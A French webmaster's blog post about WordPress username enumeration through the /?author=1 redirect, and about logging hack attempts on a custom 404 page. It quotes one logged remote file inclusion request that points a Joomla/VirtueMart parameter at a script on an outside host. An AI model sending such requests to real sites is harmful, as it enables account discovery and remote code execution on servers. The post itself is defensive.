Oh ! la belle faille !

Sur un site WordPress dont j’assure la maintenance, j’ai mis en place un plugin qui bloque les IP après 3 tentatives de connexion, et depuis que j’ai fait ça, je reçois des mails d’alertes, entre 1 tous les 2 jours jusqu’à 2 par jour. Au début les attaques portaient sur un identifiant (« admin ») qui n’est pas utilisé, car, comme on le trouve un peu partout sur internet, il ne faut pas utiliser l’identifiant admin, c’est mal.

J’avais donc pris l’habitude, en installant des WordPress, de modifier ce premier identifiant, tranquille Emile, amuse-toi pour trouver mon login.

Mais il y a quelques temps, les emails d’alerte indiquaient mes identifiants de la mort impossibles à trouver. Tous. Tous mes utilisateurs. Par quel p#t@!n de miracle ?

Eh bien c’est très simple.

En tapant www.site.com/?author=1, on est redirigé sur la page de l’auteur… rewritée ! soit www.site.com/author/mon_login_admin.

Merci la réécriture d’URL.

Bon, c’est assez simple d’empêcher cela, une redirection sur les urls /?author=x vers l’accueil par exemple et c’est bouclé, mais je me sens vraiment très con d’avoir fermé la porte et laissé la fenêtre ouverte…

 

Sécurité, sécurité et encore sécurité

Comme beaucoup de webmasters, j’ai personnalisé la page d’erreur 404 sur mon site. Rien d’extraordinaire en apparence, un simple message indiquant que la page n’a pas été trouvée, et un lien vers l’accueil. Je dirais même plus, une page plutôt laide.

Ce qui ne se voit pas en revanche, c’est que je récupère des infos sur mon visiteur perdu.

Au départ, cela devait me servir à repérer facilement un mauvais lien. Ma page 404 récupère l’url demandée et la page de provenance, puis m’envoie un mail.

Ce système mis en place, j’ai commencé à recevoir plein de messages. Beaucoup proviennent de la visite du robot de Google, qui vérifie, je ne sais pourquoi, l’inexistance d’une page bien précise.
Mais parfois, je reçois des mots doux, des tentatives de hack, d’intrusion.

J’ai donc complété mon script afin de récupérer plus d’infos sur ces visiteurs : adresse IP, navigateur utilisé… Si vous saviez tout ce que l’on peut savoir sur vous avec seulement quelques lignes de code… C’est d’ailleurs ainsi que fonctionnent les statistiques.

Tout ce blabla pour arriver à cela : ce soir j’ai reçu un message nouveau.
L’url demandée est la suivante :

database.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/ide.txt??

Je n’ai pas encore pris le temps de décortiquer le script, mais je pense qu’il permet de récupérer des trucs rigolos comme l’accès à la base de données. A noter que cela semble concerner Joomla et Virtuemart.

Quelques recherches m’ont fait arriver sur le site http://www.urlrewriting.fr, fort bien fichu, et je me suis empressée d’appliquer quelques recommandations/astuces supplémentaires du site (On n’est jamais trop prudent).

J’y ai appris l’existence d’un truc appelé libwww. Il s’agit d’un librairie perl utilisée notament par les hackers pour scanner les vulnérabilités. Plus d’infos ici : http://www.urlrewriting.fr/scripts27-Apache.htm et ici : http://www.w3.org/Library/

Les développeurs doivent se sentir fortement impliqués dans la sécurisation des sites internet et l’information aux clients. Beaucoup plus qu’ils ne le sont aujourd’hui, utilisant des programmes open-source parfois bourrés de failles, sans les corriger lorsque sortent les mises à jour.